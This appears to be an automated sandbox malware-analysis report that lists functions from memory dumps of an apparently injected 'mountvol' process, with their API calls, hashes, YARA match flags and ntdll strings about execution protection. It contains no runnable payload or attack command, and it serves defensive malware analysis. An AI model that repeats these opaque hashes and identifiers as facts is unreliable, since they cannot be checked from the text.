                                                                                        • Instruction Fuzzy Hash: CD01D631D413587AEB21AB908D42FDF7B7C9F41B94F048055FA087B280DBB4AA068BE5
                                                                                        Function 02A3F799 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeUninitialize
                                                                                        • String ID: @J7<
                                                                                        • API String ID: 3442037557-2016760708
                                                                                        • Opcode ID: c1c77d0f3211c598c18127bdba9dbc35c5cc9560734b6b73cd827ef055394663
                                                                                        • Instruction ID: 21f4fc002a3147c2e334b6f1e78ab0b09fae2899ecdc2e7b545a41b66ee6ffd1
                                                                                        • Opcode Fuzzy Hash: c1c77d0f3211c598c18127bdba9dbc35c5cc9560734b6b73cd827ef055394663
                                                                                        • Instruction Fuzzy Hash: FB315075E0020A9FDB04DFE8C8809EFB7B9FF88304B108559E505EB214DB71EA058BA0
                                                                                        Function 02A3F7A0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeUninitialize
                                                                                        • String ID: @J7<
                                                                                        • API String ID: 3442037557-2016760708
                                                                                        • Opcode ID: bd421228db4a7fabe8c8277f9f606b1e7982930b6fa03fc96d32ac9490e562f9
                                                                                        • Instruction ID: a43eaf6c6579c2575924f926469c8400813e2ac74d69277460f730ddfaf778eb
                                                                                        • Opcode Fuzzy Hash: bd421228db4a7fabe8c8277f9f606b1e7982930b6fa03fc96d32ac9490e562f9
                                                                                        • Instruction Fuzzy Hash: 993130B5E1020AAFDB14DFD8DC809EFB7B9BF88304B108559E505EB214DB75EE058BA0
                                                                                        Function 02A347A0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A34812
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Load
                                                                                        • String ID:
                                                                                        • API String ID: 2234796835-0
                                                                                        • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                        • Instruction ID: e6a3f7b327b616d221397645f5697e1d83c022a2ec8ea66abd10d72d4da15f67
                                                                                        • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                        • Instruction Fuzzy Hash: A2011EB5E4020DABDB10DBA4DD81FADB3799B44718F0042A5E90897241FA31EB548B91
                                                                                        Function 02A49B60 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A3858E,00000010,?,?,?,00000044,?,00000010,02A3858E,?,?,?), ref: 02A49BC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateInternalProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2186235152-0
                                                                                        • Opcode ID: 99cb036976d090cb023c6e3df59440f8df3d85b8747fefd199d365e3845223e7
                                                                                        • Instruction ID: aa9ac63ef8a80a76fd9c3f0469d115c5446e4c7c6bb74366ab20eed244cdcabe
                                                                                        • Opcode Fuzzy Hash: 99cb036976d090cb023c6e3df59440f8df3d85b8747fefd199d365e3845223e7
                                                                                        • Instruction Fuzzy Hash: 1C01D2B2204208BFDB04DE99DC90EEB77AEAF8C754F008508BA0DE3241D630F8518BA4
                                                                                        Function 02A29EA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A29EE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: 39d9e5d1015314edf8a7aef286db47df410313485978cde054b999cc0f539575
                                                                                        • Instruction ID: 4458b0aeeaa621da4ad2e2a116bfae7ffc2e1d09acb0fa29665a2ac9822e8ab2
                                                                                        • Opcode Fuzzy Hash: 39d9e5d1015314edf8a7aef286db47df410313485978cde054b999cc0f539575
                                                                                        • Instruction Fuzzy Hash: 9DF065733C13143AE22062E99D42FD7768D9BC0BA5F240026FA0CEB1C0DE96B8514AE5
                                                                                        Function 02A29E9E Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A29EE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        • Opcode ID: 9021841f0c83a4f7e739e44e9c1b1e132e83f9bf739a80a037aaf92bf19721aa
                                                                                        • Instruction ID: 0e25247e3d8d54628b651156953ac26379c69ebde700f8435ca95d19b866864d
                                                                                        • Opcode Fuzzy Hash: 9021841f0c83a4f7e739e44e9c1b1e132e83f9bf739a80a037aaf92bf19721aa
                                                                                        • Instruction Fuzzy Hash: F6E0D8733C031136E23062A88E42FDB664E9FC0B91F20001AF60DBB1C0CEA5BD518AA4
                                                                                        Function 02A49A80 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02A31C59,?,02A4603B,02A31C59,02A4592F,02A4603B,?,02A31C59,02A4592F,00001000,?,?,00000000), ref: 02A49ABF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: c44fcf100cbf6d45f3a0729b41021b003dc96154f87e45996f002ab2b05fb921
                                                                                        • Instruction ID: dc1fcf2342f8cf710cd80c6796092d79ad54ecd7a193e918f8695ef92e0ef81b
                                                                                        • Opcode Fuzzy Hash: c44fcf100cbf6d45f3a0729b41021b003dc96154f87e45996f002ab2b05fb921
                                                                                        • Instruction Fuzzy Hash: A1E065B2244614BBDB10EEA8DC41FAB37ADEFC9714F004419F908A7242DB31BC118AB8
                                                                                        Function 02A49AD0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,DC37B48D,00000007,00000000,00000004,00000000,02A34019,000000F4), ref: 02A49B0F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID:
                                                                                        • API String ID: 3298025750-0
                                                                                        • Opcode ID: b3ce44d6e26d6fd7bfe7f07135e175846e4c9631d83757d3d1020b48beff1ca4
                                                                                        • Instruction ID: 0f7848af7b20c0dea6517bad3fcd13ea0ab09e3358617c8c75a5917e93994008
                                                                                        • Opcode Fuzzy Hash: b3ce44d6e26d6fd7bfe7f07135e175846e4c9631d83757d3d1020b48beff1ca4
                                                                                        • Instruction Fuzzy Hash: CBE09272244204BBD710EE58DC41FAB37ADEFC9714F004419F90CA7242CA31B8118BB4
                                                                                        Function 02A385D0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 02A385FC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 6cb78963987e9668112ff3aa1bac996998751e9adf7809c92cc006f44e5b64e6
                                                                                        • Instruction ID: 8a897538bad9a8d1d76ac36ea805514f553e680d5488a71cbc8b6bed5984bb03
                                                                                        • Opcode Fuzzy Hash: 6cb78963987e9668112ff3aa1bac996998751e9adf7809c92cc006f44e5b64e6
                                                                                        • Instruction Fuzzy Hash: 0BE086B12442042FFF246BB8DC85F6A33589B88768F584661F91CDB2C1EF7DF9528154
                                                                                        Function 02A385C9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 02A385FC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 464b6a068705e0c9a1b80bc16bb93a8936320854d6295a877843447179a0b0e6
                                                                                        • Instruction ID: 088cbfc0a6cb8576939698c98180c93f0cb7e12a071915f168592698760e7a86
                                                                                        • Opcode Fuzzy Hash: 464b6a068705e0c9a1b80bc16bb93a8936320854d6295a877843447179a0b0e6
                                                                                        • Instruction Fuzzy Hash: 9FE0D8B11443042FEB206768DCC5FAA33586B8C728F540650B9189B1C1DF78F9428254
                                                                                        Function 02A383C0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,02A31F50,02A4826F,02A4592F,02A31F20), ref: 02A383F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 6a6884d01d6b116145fa740ee76c83bd96f9af7db86c38acf200d708e3b6a312
                                                                                        • Instruction ID: 861248bb0236605b5b192838a1717e587cf5af2e800df2f6299ff04d439f33ae
                                                                                        • Opcode Fuzzy Hash: 6a6884d01d6b116145fa740ee76c83bd96f9af7db86c38acf200d708e3b6a312
                                                                                        • Instruction Fuzzy Hash: B4D05E726847053FF650E6F4CD46F56368E9B40794F1500A6F90CE77C2EE65F80089E9
                                                                                        Function 02A383FA Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5bb6043a4154258612f48f8cf0c5a5a5582acf078362c22212a68d5994404c8d
                                                                                        • Instruction ID: 794cec5cb94770d2047999fb01a9fb99c07e9b8c7ac8574f3c82c8bdfe2c542a
                                                                                        • Opcode Fuzzy Hash: 5bb6043a4154258612f48f8cf0c5a5a5582acf078362c22212a68d5994404c8d
                                                                                        • Instruction Fuzzy Hash: 59C080D65445471DF71377F06C457172508CB40354F894096F44CD77C6EF19C01745D0
                                                                                        Function 03122C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: bfcd26a3e8e36b8f5e85152e3f80d22456c2346be39909f0c4cf92e6e14d222b
                                                                                        • Instruction ID: ce31df0a777d17846721123f29d5c507b37d14033ec504d8225410298107afa8
                                                                                        • Opcode Fuzzy Hash: bfcd26a3e8e36b8f5e85152e3f80d22456c2346be39909f0c4cf92e6e14d222b
                                                                                        • Instruction Fuzzy Hash: ADB09B719015D5C7DE51E760470871B7D1467D5701F29C461E2034641E4739C1E5F175

                                                                                        Non-executed Functions

                                                                                        Function 034B04DE Relevance: .2, Instructions: 151COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3914793605.00000000034B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_34b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 514d73a7f4ab21d4d932a890e4ce65e0a20f4d3143052927d0678a0d02ad7602
                                                                                        • Instruction ID: 905749200fc6ab3dc286ebadec6df972722089d1c62458aebf794da76723554e
                                                                                        • Opcode Fuzzy Hash: 514d73a7f4ab21d4d932a890e4ce65e0a20f4d3143052927d0678a0d02ad7602
                                                                                        • Instruction Fuzzy Hash: 98411674518B094FD3A8EF6990806B7F3F1FB85301F50052ED986CB762EB70E8468798
                                                                                        Function 02A2E37F Relevance: .0, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_2a20000_mountvol.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 96263d933a67afa1813f113d865d3ed94af2211f082a9bc4c2e57c2392b135e8
                                                                                        • Instruction ID: f74dcde1fddb968bae478a1d0906b93378c74684c1e69e90ebffe6b38151a944
                                                                                        • Opcode Fuzzy Hash: 96263d933a67afa1813f113d865d3ed94af2211f082a9bc4c2e57c2392b135e8
                                                                                        • Instruction Fuzzy Hash: 8DC08C3BE8102102C711086E7C921F0F7A0E78B235F7032A3F808E3240D043C41B03DA
                                                                                        Function 034BDFD9 Relevance: 57.7, Strings: 46, Instructions: 222COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3914793605.00000000034B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_34b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                        • API String ID: 0-3754132690
                                                                                        • Opcode ID: c9b720345542e1ea52292338a56c9f338c6a2f3d5ad92c4eb198a7c0e500b2b2
                                                                                        • Instruction ID: 3fcb300c1f1518be7022d9a94dffefe2376eb8dc88362319758d2e2c06c95ba5
                                                                                        • Opcode Fuzzy Hash: c9b720345542e1ea52292338a56c9f338c6a2f3d5ad92c4eb198a7c0e500b2b2
                                                                                        • Instruction Fuzzy Hash: 589161F04482988AC7158F54A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB95
                                                                                        Function 03122890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: 7892ef8ced0c4fcb8418608120fcef137f0ff1f44d509d586705de741e541c5d
                                                                                        • Instruction ID: cee131bfdeb8186e986af3ef1052436bfb00a5632e03f874d43adfab350f464b
                                                                                        • Opcode Fuzzy Hash: 7892ef8ced0c4fcb8418608120fcef137f0ff1f44d509d586705de741e541c5d
                                                                                        • Instruction Fuzzy Hash: 085129B5A00226BFCF65DF98C88097EFBF8BF0D2007148669E865D7241E334DE518BA0
                                                                                        Function 03192410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: 85c9c7222fb3df19bd3cc24d77f52eb7c61cc5f8af50df6532925979c34cd951
                                                                                        • Instruction ID: 77b8e235e84754abe83084eef71349cf0ebc7e07fa2f858bd9950c4c86618b1a
                                                                                        • Opcode Fuzzy Hash: 85c9c7222fb3df19bd3cc24d77f52eb7c61cc5f8af50df6532925979c34cd951
                                                                                        • Instruction Fuzzy Hash: 9451D575A04749BFEF34DE9CC8909BFB7F9AF4C200B04889AE496D7641D7B4EA418760
                                                                                        Function 03117630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03154742
                                                                                        • ExecuteOptions, xrefs: 031546A0
                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03154725
                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 031546FC
                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03154787
                                                                                        • Execute=1, xrefs: 03154713
                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03154655
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                        • API String ID: 0-484625025
                                                                                        • Opcode ID: 61203880270175a9fd3643729f0fd3ea5c8b932b1c83089aca92c97b75824edc
                                                                                        • Instruction ID: 8a6b5441834057bed1e54c55db6addffb8371cef561f2d18e3ba0834157e636e
                                                                                        • Opcode Fuzzy Hash: 61203880270175a9fd3643729f0fd3ea5c8b932b1c83089aca92c97b75824edc
                                                                                        • Instruction Fuzzy Hash: 68510B35A01319BBEF14EBA5EC95FED77A8AF0C300F0400A9E505AB2C1DB709AA1CF50
                                                                                        Function 031B6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                        • Instruction ID: 0de507e3f0e42759c4ae3a8b33b2ff8243c32e09ceb18d79a3c356ca33ed1bb7
                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                        • Instruction Fuzzy Hash: F2021475608341AFD304DF28C990AAEBBF5EFD8700F04892DF9894B2A4DB31E945CB52
                                                                                        Function 0312B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: __aulldvrm
                                                                                        • String ID: +$-$0$0
                                                                                        • API String ID: 1302938615-699404926
                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                        • Instruction ID: 801f4fb79152ea9db60523c0b6649833daab3c814c1d77f42a7a4113cd0b2554
                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                        • Instruction Fuzzy Hash: 4681AE70E096699FDF28CE68C8917FEBFA6AF49310F1CC159D861A73D1C73498A08B50
                                                                                        Function 031920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$[$]:%u
                                                                                        • API String ID: 48624451-2819853543
                                                                                        • Opcode ID: a02bc9810d3b62ad7261680d3c25c97870d8c094e34d5a9b4b8cefc52975fcd6
                                                                                        • Instruction ID: e310efff9a8a0202d0f46979830bda5b056c1d1ca31621ccf9cfb47c9e26d2e4
                                                                                        • Opcode Fuzzy Hash: a02bc9810d3b62ad7261680d3c25c97870d8c094e34d5a9b4b8cefc52975fcd6
                                                                                        • Instruction Fuzzy Hash: E921537AA0021DABDF10DF69D840AEEBBE8AF4C650F080526E905D7200E730D9128BA1
                                                                                        Function 0310F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • RTL: Re-Waiting, xrefs: 0315031E
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 031502BD
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 031502E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.00000000031DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_30b0000_mountvol.jbxd
                                                                                        Similarity
                                                                                        • API ID:
